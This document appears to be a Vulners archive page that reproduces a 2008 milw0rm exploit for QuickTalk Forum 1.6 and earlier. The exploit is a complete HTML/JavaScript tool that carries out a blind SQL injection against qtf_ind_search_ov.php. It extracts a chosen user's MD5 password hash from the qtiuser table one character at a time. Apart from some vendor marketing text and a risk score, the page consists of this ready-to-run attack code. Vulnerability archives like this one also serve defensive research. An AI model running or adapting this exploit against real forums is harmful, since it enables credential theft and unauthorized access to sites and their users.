Vulners
Lucene search
QuickTalk Forum <= 1.6 - Remote Blind SQL Injection Exploit
<html>
<head>
<title>QuickTalk Forum <= 1.6 Blind SQL Injection Exploit</title>
<script language="Javascript" type="text/javascript">
/*
-----------------------------------------------------------------------------------------------
- QuickTalk Forum Blind SQL Injection Exploit (qtf_ind_search_ov.php) -
- Info ---------------------------------------------------------------------------------------
- Author: t0pP8uZz & xprog -----------------------------------------------------------
- Exploit Coded By t0pP8uZz ---------------------------------------------------------
- Site: h4ck-y0u.org / milw0rm.com ------------------------------------------------
----------------------------------------------------------------------------------------------
- Passwords ARE IN MD5 ----------------------------------------------------
- Peace -----------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
*/
var site, uid, res = "";
function Start() {
site = document.getElementById("site").value;
uid = document.getElementById("pid").value;
document.getElementById("output").value = "Exploiting, Please Wait..";
Main(1, 48);
}
function Main(substr, num) {
var xmlhttp = false;
var url = site+"/qtf_ind_search_ov.php?a=user&id=1 and ASCII(SUBSTRING((SELECT pwd FROM qtiuser WHERE id="+uid+" LIMIT 0,1),"+substr+",1))="+num+"/*";
try {
xmlhttp = new XMLHttpRequest();
} catch(e) { alert("Unsupported Browser! Run Exploit In Mozilla Firefox!"); }
if(xmlhttp) {
netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");
xmlhttp.onreadystatechange = function() {
if(xmlhttp.readyState == 4) {
var content = xmlhttp.responseText;
var ele = document.getElementById("output");
if(!content.match(/0 Found/i)) {
res += String.fromCharCode(num);
ele.value = res;
num = 48;
substr++;
}
else {
if(num == 59) { num = 96; }
else { num++; }
}
if(res.length >= 32) { alert("Exploitation Successfull!. Admin MD5 Hash: "+res); return true; }
Main(substr, num)
}
};
xmlhttp.open("GET", url, true);
xmlhttp.send(null);
}
}
</script>
<style type="text/css">
<!--
.style1{color: #CC0000}
.style2 { color: #000000; font-size: 12px;}
.style3 {color: #FF0000; font-weight: bold; font-size: 12px; }
.style4 {color: #FF0000; font-size: 10px;}
-->
</style>
</head>
<body>
<p class="style1">- QuickTalk Forum <= 1.6 Blind SQL Injection Exploit -</p>
<p class="style2">Site: <input type="text" id="site" /> (URL to QuickTalk Forum site ie: http://www.site.com/quicktalkforum)</p>
<p class="style2">User: <input type="text" id="pid" /> (UserID of the user you want the MD5 hash too.)</p>
<p class="style2"><input type="button" onclick="Start();" id="button" value="Exploit" /></p>
<p class="style3">Output (MD5 Hash): <input type="text" id="output" size="100" /></p> (Do not touch untill exploit says its done)
<p class="style2">Notes: QuickTalk Forum uses the MD5 algorithms to encrypt passwords</p>
<p class="style4">Coded By t0pP8uZz - h4ck-y0u.org</p>
</body>
</html>
# milw0rm.com [2008-03-12]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1